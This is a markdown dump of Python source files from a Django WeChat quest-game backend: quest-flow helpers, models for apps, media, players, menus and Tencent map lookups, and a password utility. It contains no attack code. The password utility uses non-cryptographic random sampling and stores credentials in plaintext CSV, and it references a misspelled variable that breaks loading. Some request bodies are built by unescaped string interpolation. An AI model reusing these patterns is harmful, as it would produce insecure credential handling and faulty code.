return {'trigger': my_quest.quest_trigger, 'comment': my_quest.comment_when_available,
'enable': True, 'style': OPTION_ENABLE}
else:
# 其他情况,还不能挑战这个任务,判断是否要显示
if my_quest.show_if_unavailable:
return {'trigger': my_quest.quest_trigger, 'comment': my_quest.comment_when_unavailable,
'enable': False, 'style': OPTION_DISABLE}
else:
return None
def new_game(cur_game, reward_list, ret_dict):
ret_dict['reply_obj'] = cur_game.show_opening()
ret_dict['reply_options'] = list()
entry_quest = None
if len(cur_game.entry) > 0:
try:
entry_quest = ExploreGameQuest.objects.get(game=cur_game, quest_trigger=cur_game.entry)
except ObjectDoesNotExist:
# 游戏入口任务不存在,回退到显示所有可选任务
pass
if entry_quest:
quest_option = set_quest_option(my_quest=entry_quest, reward_list=reward_list)
if quest_option:
ret_dict['reply_options'].append(quest_option)
else:
quests = ExploreGameQuest.objects.filter(game=cur_game).order_by('reward_id')
for cur_quest in quests:
# 将可以挑战的任务放在选项中
quest_option = set_quest_option(my_quest=cur_quest, reward_list=reward_list)
if quest_option:
ret_dict['reply_options'].append(quest_option)
ret_dict['progress'] = cur_game.check_progress(reward_list=reward_list)
ret_dict['quest_trigger'] = cur_game.name
ret_dict['page_type'] = 'main'
return ret_dict
def set_quest(cur_game, trigger, ret_dict, open_id, reward_list=None):
# use None instead of a shared mutable default argument
reward_list = reward_list if reward_list is not None else list()
cur_quest = ExploreGameQuest.objects.get(game=cur_game, quest_trigger=trigger)
fromUser = ''
for_text = False
ret_dict['reply_obj'] = cur_quest.reply_msg(type='question', toUser=open_id,
fromUser=fromUser, for_text=for_text)
option_list = cur_quest.get_content_list(type='option')
next_list = cur_quest.get_content_list(type='next')
if len(next_list) > 0 and cur_quest.show_next:
for next_trigger in next_list:
try:
next_quest = ExploreGameQuest.objects.get(game=cur_game, quest_trigger=next_trigger)
quest_option = set_quest_option(my_quest=next_quest, reward_list=reward_list)
if quest_option:
ret_dict['reply_options'].append(quest_option)
except ObjectDoesNotExist:
logger.error(f'{next_trigger} does not exist')
else:
for option in option_list:
ret_dict['reply_options'].append({'trigger': option,
'comment': '',
'enable': True,
'style': OPTION_ENABLE})
ret_dict['hint_string'] = cur_quest.reply_msg(type='hint', toUser=open_id,
fromUser=fromUser, for_text=for_text)
ret_dict['quest_trigger'] = trigger
ret_dict['page_type'] = 'quest'
ret_dict['audio_link'] = cur_quest.audio_link
return ret_dict
def set_reward(quest, ret_dict):
fromUser = ''
toUser = ''
for_text = False
ret_dict['reply_obj'] = quest.reply_msg(type='reward', toUser=toUser,
fromUser=fromUser, for_text=for_text)
ret_dict['quest_trigger'] = quest.quest_trigger
ret_dict['hint_string'] = ''
ret_dict['page_type'] = 'reward'
return ret_dict
```
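A hedged sketch of how a caller might consume the dict returned by `handle_player_command`; the field names come from the code above, but the app/game/openid values are placeholders, the `render_*` helpers are hypothetical, and a configured Django environment is assumed:

```python
# Hypothetical caller, e.g. inside a Django view:
ret = handle_player_command(
    app_en_name="myapp",        # placeholder
    open_id="oABC123",          # placeholder
    game_name="treasure-hunt",  # placeholder
    cmd="开始游戏",
    for_text=False,
)
if ret["error_msg"]:
    render_error(ret["error_msg"])       # hypothetical helper
elif ret["page_type"] == "password":
    render_password_prompt(ret)          # hypothetical helper
else:
    render_page(ret["reply_obj"], ret["reply_options"], ret["progress"])
```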
#### File: wechat/wxcloudrun/models.py
```python
from django.db import models
from django.core.exceptions import *
from hashlib import sha1
from wxcloudrun.coordinate_converter import *
from django.db.models import F, Q, When, Count
import urllib3
import requests
import certifi
import json
import time
import os
import csv
import re
from wxcloudrun import reply
# from django.core.exceptions import ValidationError, ObjectDoesNotExist
from django.utils.translation import gettext_lazy as _
errcode_access_token_expired = 42001
errcode_access_token_missing = 41001
errstring_access_token_expired = 'acc token refreshed, please re-run'
errstring_access_token_refresh_failed = 'acc token refresh failed'
errcode_access_token_refresh_failed = -2
errcode_media_type_incorrect = -3
errcode_unknown_error = -9
SEP_SYM = '|' # 用于分隔多个内容的符号,后面会被用在split()函数中
keyword_hint = '提示'
keyword_card = '卡'
keyword_restart = '重新开始'
keyword_go_back = '返回'
keyword_start = '开始游戏'
keyword_control = '特殊指令'
keyword_invite = '邀请加入'
keyword_change_process = '改变进度'
error_reply_default = '你输入的答案不对,请再想想'
errcode_file = 'errcode.csv'
default_error_string = 'Unknown error'
def get_error_string(in_code, in_file=errcode_file, default_string=default_error_string):
"""
Look up the human-readable explanation for an error code in Tencent's errcode document.
:param in_code: positive in Tencent's docs; the sign is deliberately flipped here to
distinguish error codes from the count return values in admin.py
:param in_file: CSV file storing Tencent's error codes
:param default_string: default string returned when the code cannot be found
:return: the explanation if found in in_file, otherwise default_string
"""
if os.path.exists(in_file):
with open(in_file, 'r', encoding='utf-8') as f:
error_lines = [x.split(',') for x in f.readlines()]
for err_code, err_string in error_lines:
if str(in_code) == err_code:
return err_string
# 如果整个循环结束仍为找到对应的err_code,就返回默认字符串
return default_string
else:
# the error-code file itself is missing
return f'{in_file} does not exist'
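# Illustrative errcode.csv layout assumed by get_error_string above
# (two comma-separated columns per line; codes follow Tencent's public list):
#   42001,access_token expired
#   41001,access_token missing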
# Create your models here.
class WechatApp(models.Model):
"""
A WechatApp object represents one WeChat Official Account.
"""
appid = models.CharField(max_length=100)
secret = models.CharField(max_length=100)
token = models.CharField(max_length=200)
acc_token = models.CharField(max_length=500)
name = models.CharField(max_length=100)
en_name = models.CharField(max_length=100, default='')
cur_game_name = models.CharField(max_length=100, default='')
super_user = models.CharField(max_length=200, null=True)
def __str__(self):
return self.name
def super_user_list(self):
if self.super_user:
return self.super_user.split(SEP_SYM)
else:
return []
def refresh_access_token(self):
"""
Read the access_token from the local file inside the Docker container.
:return: True once self.acc_token has been refreshed and saved
"""
acc_token_file = '/.tencentcloudbase/wx/cloudbase_access_token'
with open(acc_token_file, 'r') as f:
self.acc_token = f.readline()
self.save()
return True
def get_subscr_players(self, next_openid=None):
"""
Pull the list of subscribed users from the WeChat server and reconcile it with the
existing players, creating any that are missing from the database.
Conversely, players present in the database but absent from the pull have likely
unsubscribed; they are not deleted, only flagged.
:param next_openid: start pulling from this id; pull from the beginning when None
:return: (True/False, status message)
"""
# http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED', ca_certs=certifi.where())
total_count = 1 # 所有关注用户数量,预设为1,为了发起第一次拉取
got_count = 0 # 已获取的用户数量
succ_count = 0 # 更新用户信息成功个数
fail_count = 0 # 更新用户信息失败个数
while got_count < total_count:
# request_url = f'https://api.weixin.qq.com/cgi-bin/user/get?access_token={self.acc_token}'
request_url = f'http://api.weixin.qq.com/cgi-bin/user/get'
if next_openid:
# request_url += f'&next_openid={next_openid}'
request_url += f'?next_openid={next_openid}'
# a = http.request('GET', request_url).data.decode('utf-8')
# b = json.loads(a)
a = requests.get(request_url)
a.encoding = 'utf-8'
b = a.json()
errcode = b.get('errcode', 0)
if errcode == 0:
total_count = int(b['total'])
got_count += int(b['count'])
next_openid = b['next_openid']
# data should be like
# "data":{
# "openid":["OPENID1","OPENID2"]},
openid_list = b['data']['openid']
for openid in openid_list:
try:
my_player = WechatPlayer.objects.get(app=self, open_id=openid) # 应该最多只有1个
except ObjectDoesNotExist:
my_player = WechatPlayer(app=self, open_id=openid)
result, errcode = my_player.get_user_info()
if result:
succ_count += 1
else:
fail_count += 1
elif errcode == errcode_access_token_expired:
if self.refresh_access_token():
return False, errstring_access_token_expired
else:
return False, errstring_access_token_refresh_failed
else:
errcode = 0 - int(b['errcode'])
error_string = get_error_string(errcode)
return False, error_string
# 如果成功,返回获取到的关注用户数量
return True, f'共有{got_count}个关注用户,成功更新{succ_count}个,失败{fail_count}个'
def get_media_from_tencent(self, media_type):
"""
Refresh image, video, or voice assets from the WeChat Official Account server,
deleting local entries that no longer exist on the server.
:param media_type: 'image', 'video', or 'voice'
:return: total_count on success, or a negative error code
"""
# http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED', ca_certs=certifi.where())
resource_dict = dict()
offset = 0
if self.refresh_access_token():
# request_url = f'https://api.weixin.qq.com/cgi-bin/material/batchget_material?access_token={self.acc_token}'
request_url = f'http://api.weixin.qq.com/cgi-bin/material/batchget_material'
try:
total_count = self.get_resource_count(media_type=f'{media_type}_count')
if total_count > 0:
# 从数据库中取出现有素材
images_in_db = WechatMedia.objects.filter(app=self, media_type=media_type)
media_id_in_db_list = [x.media_id for x in images_in_db]
print(f'media_id_in_db_list: {media_id_in_db_list}')
# 获得图片总数后,进行全量抓取
media_id_in_server_list = list()
while offset <= total_count:
# form_data = f'''{{
# "type":"{media_type}",
# "offset":{offset},
# "count":20
# }}'''
# a = http.request('POST', request_url, body=form_data, encode_multipart=False).data.decode(
# 'utf-8')
# b = json.loads(a)
form_data = {'type': media_type, 'offset': offset, 'count': 20}
a = requests.post(request_url, data=json.dumps(form_data, ensure_ascii=False).encode('utf-8'))
# print(f'a.encoding={a.encoding}')
a.encoding = 'utf-8'
b = a.json()
# print(f'a.encoding={a.encoding}')
errcode = b.get('errcode', 0)
if errcode == 0:
items = b['item']
item_count = b['item_count']
if item_count == 0:
break
offset += item_count
for item_dict in items:
# print(item_dict)
media_id = item_dict['media_id']
media_name = item_dict['name']
media_id_in_server_list.append(media_id)
# item_url = item_dict['url']
if media_id in media_id_in_db_list:
# 如果数据库已有media_id相同的对象,就先删除
old_medias = WechatMedia.objects.filter(app=self, media_id=media_id,
media_type=media_type)
old_medias.delete()
my_media = WechatMedia(app=self, media_id=media_id, media_type=media_type,
name=media_name, info=item_dict)
my_media.save()
else:
errcode = 0 - errcode
error_string = get_error_string(errcode)
return False
time.sleep(0.1)
# 清理数据库中冗余的条目
for media_id in media_id_in_db_list:
if media_id not in media_id_in_server_list:
try:
my_image = WechatMedia.objects.get(app=self, media_id=media_id)
my_image.delete()
except ObjectDoesNotExist:
pass
return total_count
else:
# total_count == 0 means there are no resources on the WeChat server yet;
# otherwise some other error occurred, so return total_count directly
return total_count
except Exception:
return errcode_unknown_error
else:
# failed to refresh access_token
return errcode_access_token_refresh_failed
def get_resource_count(self, media_type="image_count"):
"""
:param media_type: "voice_count", "video_count","image_count", "news_count"
:return:
"""
http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED', ca_certs=certifi.where())
# request_count_url = f'https://api.weixin.qq.com/cgi-bin/material/get_materialcount?access_token={self.acc_token}'
request_count_url = f'http://api.weixin.qq.com/cgi-bin/material/get_materialcount'
# 获取图片总数
# a = http.request('GET', request_count_url).data.decode('utf-8')
# b = json.loads(a)
a = requests.get(request_count_url)
a.encoding = 'utf-8'
b = a.json()
print(f'b={b}')
errcode = b.get('errcode', 0)
if errcode > 0:
# print(b)
# returning the negative value for error indicator
return 0 - errcode
else:
if media_type in b.keys():
total_count = b[media_type]
print(f'return count: {total_count}')
return total_count
else:
print(f'media_type incorrect: {media_type}')
return errcode_media_type_incorrect
def image_count(self):
return WechatMedia.objects.filter(app=self, media_type='image').count()
def video_count(self):
return WechatMedia.objects.filter(app=self, media_type='video').count()
def subscriber_count(self):
return WechatPlayer.objects.filter(app=self, subscribe=1).count()
def add_menu(self, remark='', menu_string=None):
my_menu = WechatMenu(app=self, remark=remark, menu_string=menu_string)
my_menu.save()
class WechatMedia(models.Model):
"""
Image, video, and voice assets of a WeChat Official Account.
These asset types share the same info field layout;
media_type is added to tell them apart.
"""
app = models.ForeignKey(WechatApp, on_delete=models.CASCADE)
media_id = models.CharField(max_length=100, null=True)
name = models.CharField(max_length=200, null=True, blank=True)
info = models.JSONField()
media_type = models.CharField(max_length=20, null=True)
def __str__(self):
my_info = self.info
return self.name
def url(self):
my_info = self.info
return my_info.get('url', '')
def update_time(self):
my_info = self.info
time_str = time.localtime(my_info['update_time'])
return time.strftime("%Y-%m-%d %H:%M:%S", time_str)
def tags(self):
my_info = self.info
return my_info.get('tags', '')
def delete_from_wechat(self):
"""
Delete this media asset from the WeChat server by its media id.
:return: True on success, False otherwise
"""
media_count = self.app.get_resource_count() # 用于确保刷新access_token
if media_count >= 0:
http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED', ca_certs=certifi.where())
request_url = f'https://api.weixin.qq.com/cgi-bin/material/del_material?access_token={self.app.acc_token}'
my_info = json.loads(self.info)
media_id = my_info['media_id']
name = my_info['name']
print(f'deleting {media_id}')
form_data = f'''{{
"media_id":"{media_id}"
}}'''
a = http.request('POST', request_url, body=form_data, encode_multipart=False).data.decode('utf-8')
b = json.loads(a)
errcode = b.get('errcode', 0)
if errcode > 0:
errcode = 0 - int(b['errcode'])
error_string = get_error_string(errcode)
return False
else:
self.delete()
# print(f'已成功删除{name}')
return True
else:
print(f'Can not get media_count')
return False
def replace_content_with_hyperlink(my_content):
"""
Use a regex to find keywords wrapped in 【xx】 and replace each with a WeChat
reply hyperlink of the form:
【<a href="weixin://bizmsgmenu?msgmenuid=1&msgmenucontent=xx">xx</a>】
(An earlier variant, kept commented out below, instead appended one hyperlink
per option at the end when there was more than one, under a "你的选择是?"
prompt.)
:param my_content:
:return:
"""
def insert_hyperlink(matched):
link_before = '【<a href="weixin://bizmsgmenu?msgmenuid=1&msgmenucontent='
link_mid = '">'
link_after = '</a>】'
keyword = matched.group('keyword')
return f'{link_before}{keyword}{link_mid}{keyword}{link_after}'
# 根据Python文档,使用(?P<name>...)语法时,那这个name,可以直接在re.sub()中repl参数指定的函数里引用
# 例如insert_hyperlink函数中只会带1个参数--matched对象,它的group函数就可以直接调用以name命名的匹配字符串
re_pattern = '【(?P<keyword>[^】]+)】'
matches = re.findall(pattern=re_pattern, string=my_content)
# link_before = '<a href="weixin://bizmsgmenu?msgmenuid=1&msgmenucontent='
# link_mid = '">'
# link_after = '</a>'
if len(matches) > 0:
# # 如果超过1过选项,就在最后列出每个选项的超链接
# attached_string = f'\n你的选择是?\n\n'
# for keyword in matches:
# attached_string += f'''{link_before}{keyword}{link_mid}{keyword}{link_after}\n\n'''
# return f'{my_content}\n{attached_string}'
# elif len(matches) == 1:
# # 如果只有1个关键词,就直接将关键词替换成超链接
my_result = re.sub(pattern=re_pattern, repl=insert_hyperlink, string=my_content)
return my_result
else:
# no keywords in the text: return it unchanged
return my_content
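# Illustrative call (hypothetical input, kept as a comment since this sits
# mid-module):
#   replace_content_with_hyperlink('Go to 【garden】')
#   -> 'Go to 【<a href="weixin://bizmsgmenu?msgmenuid=1&msgmenucontent=garden">garden</a>】'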
class WechatPlayer(models.Model):
app = models.ForeignKey(WechatApp, on_delete=models.CASCADE, null=True)
name = models.CharField(max_length=100, default='-', blank=True)
open_id = models.CharField(max_length=100, default='', primary_key=True)
cur_game_name = models.CharField(max_length=100, default='', blank=True)
is_audit = models.BooleanField(default=False)
game_hist = models.JSONField(null=True, blank=True)
nickname = models.CharField(max_length=100, default='', blank=True)
remark = models.CharField(max_length=100, default='', blank=True)
subscribe_scene = models.CharField(max_length=100, default='', blank=True)
sex = models.IntegerField(null=True, blank=True)
tagid_list = models.CharField(max_length=200, default='', blank=True)
user_info = models.JSONField(null=True, blank=True)
subscribe = models.IntegerField(default=0, blank=True)
head_image = models.URLField(max_length=500, default='', blank=True)
cur_location = models.CharField(max_length=200, default='', blank=True)
cur_longitude = models.FloatField(null=True, blank=True)
cur_latitude = models.FloatField(null=True, blank=True)
cur_Precision = models.FloatField(null=True, blank=True)
poi_keyword = models.CharField('搜索兴趣点的关键词', max_length=50, default='', blank=True)
poi_dist = models.IntegerField('搜索兴趣点的距离范围', default=100, blank=True)
waiting_status_choice = [('', 'not in waiting status'), ('w_keyword', 'waiting for keyword'),
('w_dist', 'waiting for distance'), ('w_password', 'waiting for password')]
waiting_status = models.CharField(max_length=50, default='', blank=True)
# tag_id = models.IntegerField(default=0, blank=True)
# {'game_list': [WechatGameData]}
def __str__(self):
return self.nickname
def game_data_count(self):
return len(WechatGameData.objects.filter(player=self))
def save(self, *args, **kwargs):
self.poi_dist = max(self.poi_dist, 10)
super().save(*args, **kwargs)
def set_remark(self, remark):
http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED', ca_certs=certifi.where())
request_url = f'https://api.weixin.qq.com/cgi-bin/user/info/updateremark?access_token={self.app.acc_token}'
form_data = f'''{{
"openid":"{self.open_id}",
"remark":"{self.remark}"
}}'''
a = http.request('POST', request_url, body=form_data.encode('utf-8'),
encode_multipart=False).data.decode('utf-8')
b = json.loads(a)
errcode = b.get('errcode', 0)
if errcode == errcode_access_token_expired:
if self.app.refresh_access_token():
return False, errstring_access_token_expired
else:
return False, errstring_access_token_refresh_failed
elif errcode > 0:
errcode = 0 - int(b['errcode'])
error_string = get_error_string(errcode)
return False, error_string
else:
# 如果成功获取信息,就直接返回json文件
return True, b
def get_user_info(self):
"""
Fetch this user's info from the WeChat server (using self.open_id).
:return: (True, errcode) on success, or (False, error code/message)
"""
request_url = f'http://api.weixin.qq.com/cgi-bin/user/info?openid={self.open_id}&lang=zh_CN'
# acc_token = self.app.refresh_access_token()
# request_url = f'http://api.weixin.qq.com/sns/userinfo?access_token={acc_token}&openid={self.open_id}&lang=zh_CN'
# a = http.request('GET', request_url).data.decode('utf-8')
# b = json.loads(a)
a = requests.get(request_url)
a.encoding = 'utf-8'
b = a.json()
print(b)
errcode = b.get('errcode', 0)
if errcode == 0:
self.nickname = b['nickname']
self.remark = b['remark']
self.subscribe_scene = b['subscribe_scene']
self.sex = int(b['sex'])
self.tagid_list = b['tagid_list']
self.subscribe = b['subscribe']
self.user_info = b
self.save()
return True, errcode
elif errcode == errcode_access_token_expired:
if self.app.refresh_access_token():
return False, errstring_access_token_expired
else:
return False, errstring_access_token_refresh_failed
else:
errcode = 0 - int(b['errcode'])
return False, errcode
def get_nearby_poi(self):
if self.cur_longitude is None or self.cur_latitude is None:
return False, '未能获取用户位置信息'
elif len(self.poi_keyword) == 0:
return False, '未设置搜索关键词'
elif self.poi_dist < 10:
return False, '搜索范围小与10米最低要求,请重新设置'
my_map = QqMap.objects.all()[0]
result, ret_obj = my_map.search_places(longitude=self.cur_longitude, latitude=self.cur_latitude,
dist=self.poi_dist, keyword=self.poi_keyword)
if result:
poi_list = ret_obj
self.cur_location += str(poi_list)
self.save()
return result, poi_list
else:
errmsg = ret_obj
return result, errmsg
def get_location_address(self):
if self.cur_longitude is None or self.cur_latitude is None:
return False, '未能获取用户位置信息'
my_map = QqMap.objects.all()[0]
result, ret_obj = my_map.get_place_name(longitude=self.cur_longitude, latitude=self.cur_latitude)
if result:
self.cur_location = ret_obj
self.save()
return result, ret_obj
else:
errmsg = ret_obj
return result, errmsg
def hash_with_game(self, cur_game_name, len=8):
temp_string = (self.open_id + cur_game_name).encode('utf-8')
return sha1(temp_string).hexdigest()[0-len:]
class AppKeyword(models.Model):
app = models.ForeignKey(WechatApp, on_delete=models.CASCADE, null=True)
keyword = models.CharField(max_length=100, null=True)
content_type_choice = [('文字', '文字'), ('视频', '视频'), ('图片', '图片')]
content_type = models.CharField(max_length=100, choices=content_type_choice, default='文字')
content_data = models.TextField(max_length=1000, default='')
def reply_msg(self, toUser, fromUser):
if self.content_type in ['文字', 'TEXT']:
text_content = self.content_data.replace('<br>', '\n').strip()
replyMsg = reply.TextMsg(toUser, fromUser, text_content)
elif self.content_type in ['图片', 'PIC']:
my_media = WechatMedia.objects.filter(app=self.app, name=self.content_data)
if len(my_media) > 0:
# 如果有重名的图片,就发第一张
mediaId = my_media[0].media_id
replyMsg = reply.ImageMsg(toUser, fromUser, mediaId)
else:
text_content = f'找不到对应的图片{self.content_data},请联系管理员'
replyMsg = reply.TextMsg(toUser, fromUser, text_content)
elif self.content_type in ['视频', 'VIDEO']:
my_media = WechatMedia.objects.filter(app=self.app, name=self.content_data)
if len(my_media) > 0:
# 如果有重名的视频,就发第一个
mediaId = my_media[0].media_id
replyMsg = reply.VideoMsg(toUser, fromUser, mediaId, self.content_data, '')
else:
text_content = f'找不到对应的视频{self.content_data},请联系管理员'
replyMsg = reply.TextMsg(toUser, fromUser, text_content)
else:
text_content = f'app关键词的内容类型{self.content_type}错误,请联系管理员'
replyMsg = reply.TextMsg(toUser, fromUser, text_content)
return replyMsg
class ErrorAutoReply(models.Model):
"""
Auto-reply object used when a player answers incorrectly.
"""
reply_type_choice = [('TEXT', '文字'), ('PIC', '图片')]
reply_type = models.CharField(max_length=10, default='文字', choices=reply_type_choice)
reply_content = models.TextField(default=error_reply_default)
is_active = models.BooleanField(default=True)
def __str__(self):
return self.reply_content
def reply_msg(self, toUser, fromUser='', for_text=True):
content_type = self.reply_type
content_data = self.reply_content
if content_type == 'TEXT':
text_content = content_data.replace('<br>', '\n').strip()
if for_text:
text_content = replace_content_with_hyperlink(text_content)
replyMsg = reply.TextMsg(toUser, fromUser, text_content)
else:
ret_content = text_content
elif content_type == 'PIC':
# NOTE: ErrorAutoReply defines no 'game' relation, so this lookup raises
# AttributeError whenever a PIC reply is configured.
my_media = WechatMedia.objects.filter(app=self.game.app, name=content_data)
if len(my_media) > 0:
# 如果有重名的图片,就发第一张
mediaId = my_media[0].media_id
if for_text:
replyMsg = reply.ImageMsg(toUser, fromUser, mediaId)
else:
# return the image url
ret_content = my_media[0].info.get('url', '')
else:
text_content = f'找不到对应的图片{content_data},请联系管理员'
replyMsg = reply.TextMsg(toUser, fromUser, text_content)
ret_content = text_content
else:
text_content = f'答错自动回复内容{content_type}错误,请联系管理员'
replyMsg = reply.TextMsg(toUser, fromUser, text_content)
ret_content = text_content
if for_text:
return replyMsg
else:
return ret_content
class WechatMenu(models.Model):
"""
Custom menu of the Official Account.
"""
app = models.ForeignKey(WechatApp, on_delete=models.CASCADE, null=True, blank=True)
menu_string = models.JSONField(null=True, blank=True)
remark = models.CharField(max_length=100, default='', blank=True)
MatchRule = models.BooleanField(default=False)
match_tag_id = models.CharField(max_length=100, default='', blank=True)
def __str__(self):
return self.remark
def save(self):
result, ret_obj = self.gen_menu_json()
if result:
super(WechatMenu, self).save()
return True, 'OK'
else:
return False, ret_obj
def gen_menu_json(self):
buttons = MenuButton.objects.filter(menu=self)
json_dict = dict()
json_dict['button'] = list()
for button in buttons:
result, ret_obj = button.gen_json_dict()
if result:
json_dict['button'].append(ret_obj)
else:
return False, ret_obj
if self.MatchRule:
if len(self.match_tag_id) > 0:
json_dict['matchrule'] = {'tag_id': self.match_tag_id}
self.menu_string = json_dict
return True, 'OK'
def submit_menu(self):
acc_token = self.app.acc_token
# http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED', ca_certs=certifi.where())
# request_url = f'https://api.weixin.qq.com/cgi-bin/menu/create?access_token={acc_token}'
request_url = f'http://api.weixin.qq.com/cgi-bin/menu/create'
try:
pass
# my_menu = json.loads(self.menu_string, encoding='utf-8')
except:
return False, 'menu_string is not valid'
else:
# a = http.request('POST', request_url, body=json.dumps(self.menu_string, ensure_ascii=False).encode('utf-8'),
# encode_multipart=False).data.decode('utf-8')
# b = json.loads(a)
a = requests.post(request_url, data=json.dumps(self.menu_string, ensure_ascii=False).encode('utf-8'))
a.encoding = 'utf-8'
b = a.json()
errcode = b.get('errcode', 0)
errmsg = b.get('errmsg', 'OK')
if errcode == 0:
return True, errmsg
elif errcode == errcode_access_token_expired:
if self.app.refresh_access_token():
return False, errstring_access_token_expired
else:
return False, errstring_access_token_refresh_failed
else:
# any other error code: surface the error message
return False, errmsg
class MenuButton(models.Model):
menu = models.ForeignKey(WechatMenu, on_delete=models.CASCADE, null=True)
name = models.CharField('菜单标题', max_length=120, default='')
type_choice = [('sub_button', '二级菜单'), ('click', '按钮'), ('view', '链接'), ('scancode_waitmsg', '扫码带提示'),
('scancode_push', '扫码推事件'), ('pic_sysphoto', '系统拍照发图'),
('pic_photo_or_album', '拍照或者相册发图'),
('pic_weixin', '微信相册发图'), ('location_select', '选择位置'),
('media_id', '图文消息'), ('view_limited', '图文消息(限制)'),
('article_id', '发布后的图文消息'), ('article_view_limited', '发布后的图文消息(限制)')]
type = models.CharField(max_length=100, default='click', choices=type_choice)
key = models.CharField(max_length=100, default='', blank=True)
url = models.TextField(max_length=1000, default='', blank=True)
media_id = models.CharField(max_length=100, default='', blank=True)
app_id = models.CharField('小程序id', max_length=300, default='', blank=True)
pagepath = models.CharField('小程序页面路径', max_length=300, default='', blank=True)
article_id = models.CharField(max_length=100, default='', blank=True)
sub_button = models.JSONField(null=True, blank=True)
def __str__(self):
return f'{self.menu.remark} {self.name}'
def gen_json_dict(self):
ret_dict = dict()
if len(self.name) == 0:
return False, 'name is blank'
else:
ret_dict['name'] = self.name
if self.type == 'sub_button':
sub_buttons = MenuSubButton.objects.filter(parent_button=self)
if len(sub_buttons) > 0:
# check sub buttons
ret_dict['sub_button'] = list()
for sub_button in sub_buttons:
result, ret_obj = sub_button.gen_json_dict()
if result:
ret_dict['sub_button'].append(ret_obj)
else:
return False, ret_obj
self.sub_button = ret_dict
self.save()
elif self.type in ['view']:
if len(self.url) == 0:
return False, 'url is blank while type=view'
else:
ret_dict['url'] = self.url
ret_dict['type'] = self.type
elif self.type in ['click', 'location_select']:
if len(self.key) == 0:
return False, f'key is blank in {self.name}'
else:
ret_dict['key'] = self.key
ret_dict['type'] = self.type
return True, ret_dict
class MenuSubButton(models.Model):
parent_button = models.ForeignKey(MenuButton, on_delete=models.DO_NOTHING, null=True)
name = models.CharField('菜单标题', max_length=120, default='')
type_choice = [('click', '按钮'), ('view', '链接'), ('scancode_waitmsg', '扫码带提示'),
('scancode_push', '扫码推事件'), ('pic_sysphoto', '系统拍照发图'),
('pic_photo_or_album', '拍照或者相册发图'),
('pic_weixin', '微信相册发图'), ('location_select', '选择位置'),
('media_id', '图文消息'), ('view_limited', '图文消息(限制)'),
('article_id', '发布后的图文消息'), ('article_view_limited', '发布后的图文消息(限制)')]
type = models.CharField(max_length=100, default='click', choices=type_choice)
key = models.CharField(max_length=100, default='', blank=True)
url = models.TextField(max_length=1000, default='', blank=True)
media_id = models.CharField(max_length=100, default='', blank=True)
app_id = models.CharField('小程序id', max_length=300, default='', blank=True)
pagepath = models.CharField('小程序页面路径', max_length=300, default='', blank=True)
article_id = models.CharField(max_length=100, default='', blank=True)
def __str__(self):
return f'{self.parent_button.name} {self.name}'
def gen_json_dict(self):
ret_dict = dict()
if len(self.name) == 0:
return False, 'name is blank'
else:
ret_dict['name'] = self.name
if self.type in ['click', 'location_select']:
if len(self.key) == 0:
return False, 'key is blank while type=click'
else:
ret_dict['key'] = self.key
ret_dict['type'] = self.type
elif self.type in ['view']:
if len(self.url) == 0:
return False, 'url is blank while type=view'
else:
ret_dict['url'] = self.url
ret_dict['type'] = self.type
else:
pass
return True, ret_dict
class QqMap(models.Model):
name = models.CharField(max_length=100, default='', blank=True)
key = models.CharField(max_length=100, default='', blank=True)
def __str__(self):
return self.name
def search_places(self, longitude, latitude, dist, keyword):
longitude, latitude = wgs84_to_gcj02(longitude, latitude)
http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED', ca_certs=certifi.where())
request_url = 'https://apis.map.qq.com/ws/place/v1/search?'
request_url += f'boundary=nearby({latitude},{longitude},{dist},0)'
request_url += f'&key={self.key}&keyword={keyword}'
a = http.request('GET', request_url).data.decode('utf-8')
b = json.loads(a)
status = b.get('status', -1)
ret_list = list()
if status == 0:
POIs = b.get('data', list())
for poi_dict in POIs:
poi_title = poi_dict.get('title', '')
if len(poi_title) > 0:
ret_list.append(poi_title)
return True, ret_list
else:
message = b.get('message', '')
return False, message
def get_place_name(self, longitude, latitude):
longitude, latitude = wgs84_to_gcj02(longitude, latitude)
http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED', ca_certs=certifi.where())
request_url = f'https://apis.map.qq.com/ws/geocoder/v1/?location={latitude},{longitude}&key={self.key}'
a = http.request('GET', request_url).data.decode('utf-8')
b = json.loads(a)
status = b.get('status', -1)
if status == 0:
result = b.get('result', dict())
address = result.get('address', '')
recommend = result.get('formatted_addresses', dict()).get('recommend', '')
return True, f'{address} {recommend}'
else:
message = b.get('message', '')
return False, message
```
#### File: wechat/wxcloudrun/user_manage.py
```python
from random import sample
import csv
def gen_passwd(initial='0', length=7, use_symbol=False, use_lower=True, use_number=False, use_upper=True):
"""
Password generator.
:param initial: character(s) the password starts with, to tell passwords for different purposes apart
:param length:
:param use_symbol:
:param use_lower:
:param use_number:
:param use_upper:
:return:
"""
password_list = list()
symbol_list = ['!', '@', '#', '$', '%', '^', '&', '*', '(', ')', '_', '+', '-', '=']
number_list = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']
upper_list = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T',
'U', 'V', 'W', 'X', 'Y', 'Z']
lower_list = ['z', 'y', 'x', 'w', 'v', 'u', 't', 's', 'r', 'q', 'p', 'o', 'n', 'm', 'l', 'k', 'j', 'i', 'h', 'g',
'f', 'e', 'd', 'c', 'b', 'a']
if use_lower:
password_list.extend(lower_list)
if use_upper:
password_list.extend(upper_list)
if use_number:
password_list.extend(number_list)
if use_symbol:
password_list.extend(symbol_list)
if len(password_list) > 0 and length > 0:
password = initial
password += ''.join(sample(password_list, length)).replace(' ', '')
return password
else:
return False
# Path of the credentials CSV shared by save_passwd_to_csv and load_passwd_from_csv.
allowed_users_list_file = '../data/user_list_new.csv'
def save_passwd_to_csv(account_passwd_dict):
with open(allowed_users_list_file, 'w') as f:
for password, account in account_passwd_dict.items():
f.writelines(f'{account},{password}\n')
def load_passwd_from_csv():
account_passwd_dict = dict()
with open(allowed_usesr_list_file, 'r') as f:
passwd_data = csv.reader(f)
for (account, password) in passwd_data:
account_passwd_dict[password] = account
return account_passwd_dict
if __name__ == '__main__':
    account_passwd_dict = load_passwd_from_csv()
    generated = 0
